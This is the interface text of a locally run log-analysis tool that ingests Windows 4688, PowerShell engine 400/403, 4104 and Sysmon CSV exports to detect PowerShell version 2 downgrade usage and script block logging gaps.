drop 4688 or powershell evtx csv · detect -version 2 · engine 400/403 · script block logging gaps · export csv · runs locally
input
drop evtx csv
or click
4688 process creation · event 400/403 · optional 4104 for sbl gap correlation
drop security 4688 · powershell operational · sysmon csv